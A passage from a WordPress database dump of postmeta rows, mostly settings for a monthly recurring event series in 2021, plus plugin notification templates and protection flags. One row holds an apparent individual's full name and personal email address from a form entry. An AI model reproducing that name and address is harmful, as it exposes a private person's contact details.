01:00:00'),(130096,263623,'_EventDuration','3600'),(130384,263624,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130409,263625,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130381,263623,'_dp_original','263319'),(130382,263623,'_EventVenueID','263589'),(130383,263623,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263622;a:2:{s:9:\"timestamp\";i:1615917600;s:8:\"duration\";i:3600;}i:263623;a:2:{s:9:\"timestamp\";i:1618941600;s:8:\"duration\";i:3600;}i:263624;a:2:{s:9:\"timestamp\";i:1621360800;s:8:\"duration\";i:3600;}i:263625;a:2:{s:9:\"timestamp\";i:1623780000;s:8:\"duration\";i:3600;}i:263626;a:2:{s:9:\"timestamp\";i:1626804000;s:8:\"duration\";i:3600;}i:263627;a:2:{s:9:\"timestamp\";i:1629223200;s:8:\"duration\";i:3600;}i:263628;a:2:{s:9:\"timestamp\";i:1632247200;s:8:\"duration\";i:3600;}i:263629;a:2:{s:9:\"timestamp\";i:1634666400;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130365,263623,'_EventOrigin','events-calendar'),(130367,263623,'_RTECregistrationsDisabled','1'),(130368,263623,'_RTECdeadlineType','start'),(130369,263623,'_RTECwhoCanRegister','any'),(130370,263623,'_RTEClimitRegistrations','0'),(130363,263623,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130374,263623,'_EventShowMapLink','1'),(130375,263623,'_EventShowMap','1'),(130376,263623,'_EventCurrencySymbol',''),(130371,263623,'_RTECmaxRegistrations','30'),(130364,263623,'_EventOrigin','events-calendar'),(130372,263623,'boldgrid_hide_page_title','0'),(130373,263623,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130360,263623,'protect_children',''),(130361,263623,'protect_children',''),(130362,263623,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130125,263624,'_EventStartDate','2021-05-18 18:00:00'),(130126,263624,'_EventStartDateUTC','2021-05-19 00:00:00'),(130127,263624,'_EventEndDate','2021-05-18 19:00:00'),(130128,263624,'_EventEndDateUTC','2021-05-19 01:00:00'),(130129,263624,'_EventDuration','3600'),(130390,263624,'_EventOrigin','events-calendar'),(151775,266078,'mec_event_status','EventScheduled'),(130392,263624,'_RTECregistrationsDisabled','1'),(130393,263624,'_RTECdeadlineType','start'),(130394,263624,'_RTECwhoCanRegister','any'),(130395,263624,'_RTEClimitRegistrations','0'),(130388,263624,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130408,263624,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263622;a:2:{s:9:\"timestamp\";i:1615917600;s:8:\"duration\";i:3600;}i:263623;a:2:{s:9:\"timestamp\";i:1618941600;s:8:\"duration\";i:3600;}i:263624;a:2:{s:9:\"timestamp\";i:1621360800;s:8:\"duration\";i:3600;}i:263625;a:2:{s:9:\"timestamp\";i:1623780000;s:8:\"duration\";i:3600;}i:263626;a:2:{s:9:\"timestamp\";i:1626804000;s:8:\"duration\";i:3600;}i:263627;a:2:{s:9:\"timestamp\";i:1629223200;s:8:\"duration\";i:3600;}i:263628;a:2:{s:9:\"timestamp\";i:1632247200;s:8:\"duration\";i:3600;}i:263629;a:2:{s:9:\"timestamp\";i:1634666400;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130404,263624,'_EventURL',''),(130405,263624,'_EventTimezone','America/Denver'),(130406,263624,'_dp_original','263319'),(130407,263624,'_EventVenueID','263589'),(130402,263624,'_EventCurrencyPosition','prefix'),(130403,263624,'_EventCost',''),(130399,263624,'_EventShowMapLink','1'),(130400,263624,'_EventShowMap','1'),(130401,263624,'_EventCurrencySymbol',''),(130389,263624,'_EventOrigin','events-calendar'),(130396,263624,'_RTECmaxRegistrations','30'),(130397,263624,'boldgrid_hide_page_title','0'),(130398,263624,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130385,263624,'protect_children',''),(130386,263624,'protect_children',''),(130387,263624,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130427,263625,'_EventCurrencyPosition','prefix'),(130428,263625,'_EventCost',''),(130429,263625,'_EventURL',''),(130430,263625,'_EventTimezone','America/Denver'),(130158,263625,'_EventStartDate','2021-06-15 18:00:00'),(130159,263625,'_EventStartDateUTC','2021-06-16 00:00:00'),(130160,263625,'_EventEndDate','2021-06-15 19:00:00'),(130161,263625,'_EventEndDateUTC','2021-06-16 01:00:00'),(130162,263625,'_EventDuration','3600'),(130434,263626,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130459,263627,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(130431,263625,'_dp_original','263319'),(130432,263625,'_EventVenueID','263589'),(130433,263625,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263622;a:2:{s:9:\"timestamp\";i:1615917600;s:8:\"duration\";i:3600;}i:263623;a:2:{s:9:\"timestamp\";i:1618941600;s:8:\"duration\";i:3600;}i:263624;a:2:{s:9:\"timestamp\";i:1621360800;s:8:\"duration\";i:3600;}i:263625;a:2:{s:9:\"timestamp\";i:1623780000;s:8:\"duration\";i:3600;}i:263626;a:2:{s:9:\"timestamp\";i:1626804000;s:8:\"duration\";i:3600;}i:263627;a:2:{s:9:\"timestamp\";i:1629223200;s:8:\"duration\";i:3600;}i:263628;a:2:{s:9:\"timestamp\";i:1632247200;s:8:\"duration\";i:3600;}i:263629;a:2:{s:9:\"timestamp\";i:1634666400;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130415,263625,'_EventOrigin','events-calendar'),(151774,266078,'mec_fields','a:0:{}'),(130417,263625,'_RTECregistrationsDisabled','1'),(130418,263625,'_RTECdeadlineType','start'),(130419,263625,'_RTECwhoCanRegister','any'),(130420,263625,'_RTEClimitRegistrations','0'),(130413,263625,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130424,263625,'_EventShowMapLink','1'),(130425,263625,'_EventShowMap','1'),(130426,263625,'_EventCurrencySymbol',''),(130414,263625,'_EventOrigin','events-calendar'),(130421,263625,'_RTECmaxRegistrations','30'),(130422,263625,'boldgrid_hide_page_title','0'),(130423,263625,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130410,263625,'protect_children',''),(130411,263625,'protect_children',''),(130412,263625,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130191,263626,'_EventStartDate','2021-07-20 18:00:00'),(130192,263626,'_EventStartDateUTC','2021-07-21 00:00:00'),(130193,263626,'_EventEndDate','2021-07-20 19:00:00'),(130194,263626,'_EventEndDateUTC','2021-07-21 01:00:00'),(130195,263626,'_EventDuration','3600'),(134107,264081,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:37509;s:12:\"smushed-size\";i:36249;s:15:\"savings-percent\";d:3.359999999999999875655021241982467472553253173828125;}'),(145170,265426,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(145169,265426,'passster_activate_global_protection',NULL),(137279,7172,'passster_activate_global_protection',NULL),(137280,7172,'passster_activate_protection',NULL),(137281,7172,'passster_protection_type','password'),(137282,264411,'_field_133','dennis'),(137283,264411,'_field_134','faulk'),(137284,264411,'_field_135','dennisfaulk178@gmail.com'),(130440,263626,'_EventOrigin','events-calendar'),(151773,266078,'mec_op','a:0:{}'),(130442,263626,'_RTECregistrationsDisabled','1'),(130443,263626,'_RTECdeadlineType','start'),(130444,263626,'_RTECwhoCanRegister','any'),(130445,263626,'_RTEClimitRegistrations','0'),(130438,263626,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130458,263626,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263622;a:2:{s:9:\"timestamp\";i:1615917600;s:8:\"duration\";i:3600;}i:263623;a:2:{s:9:\"timestamp\";i:1618941600;s:8:\"duration\";i:3600;}i:263624;a:2:{s:9:\"timestamp\";i:1621360800;s:8:\"duration\";i:3600;}i:263625;a:2:{s:9:\"timestamp\";i:1623780000;s:8:\"duration\";i:3600;}i:263626;a:2:{s:9:\"timestamp\";i:1626804000;s:8:\"duration\";i:3600;}i:263627;a:2:{s:9:\"timestamp\";i:1629223200;s:8:\"duration\";i:3600;}i:263628;a:2:{s:9:\"timestamp\";i:1632247200;s:8:\"duration\";i:3600;}i:263629;a:2:{s:9:\"timestamp\";i:1634666400;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130454,263626,'_EventURL',''),(130455,263626,'_EventTimezone','America/Denver'),(130456,263626,'_dp_original','263319'),(130457,263626,'_EventVenueID','263589'),(130452,263626,'_EventCurrencyPosition','prefix'),(130453,263626,'_EventCost',''),(130449,263626,'_EventShowMapLink','1'),(130450,263626,'_EventShowMap','1'),(130451,263626,'_EventCurrencySymbol',''),(130439,263626,'_EventOrigin','events-calendar'),(130446,263626,'_RTECmaxRegistrations','30'),(130447,263626,'boldgrid_hide_page_title','0'),(130448,263626,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130435,263626,'protect_children',''),(130436,263626,'protect_children',''),(130437,263626,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(130477,263627,'_EventCurrencyPosition','prefix'),(130478,263627,'_EventCost',''),(130479,263627,'_EventURL',''),(130480,263627,'_EventTimezone','America/Denver'),(130224,263627,'_EventStartDate','2021-08-17 18:00:00'),(130225,263627,'_EventStartDateUTC','2021-08-18 00:00:00'),(130226,263627,'_EventEndDate','2021-08-17 19:00:00'),(130227,263627,'_EventEndDateUTC','2021-08-18 01:00:00'),(130228,263627,'_EventDuration','3600'),(130484,263628,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(130509,263629,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(130481,263627,'_dp_original','263319'),(130482,263627,'_EventVenueID','263589'),(130483,263627,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263622;a:2:{s:9:\"timestamp\";i:1615917600;s:8:\"duration\";i:3600;}i:263623;a:2:{s:9:\"timestamp\";i:1618941600;s:8:\"duration\";i:3600;}i:263624;a:2:{s:9:\"timestamp\";i:1621360800;s:8:\"duration\";i:3600;}i:263625;a:2:{s:9:\"timestamp\";i:1623780000;s:8:\"duration\";i:3600;}i:263626;a:2:{s:9:\"timestamp\";i:1626804000;s:8:\"duration\";i:3600;}i:263627;a:2:{s:9:\"timestamp\";i:1629223200;s:8:\"duration\";i:3600;}i:263628;a:2:{s:9:\"timestamp\";i:1632247200;s:8:\"duration\";i:3600;}i:263629;a:2:{s:9:\"timestamp\";i:1634666400;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130465,263627,'_EventOrigin','events-calendar'),(130467,263627,'_RTECregistrationsDisabled','1'),(130468,263627,'_RTECdeadlineType','start'),(130469,263627,'_RTECwhoCanRegister','any'),(130470,263627,'_RTEClimitRegistrations','0'),(130463,263627,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(130474,263627,'_EventShowMapLink','1'),(130475,263627,'_EventShowMap','1'),(130476,263627,'_EventCurrencySymbol',''),(130464,263627,'_EventOrigin','events-calendar'),(130471,263627,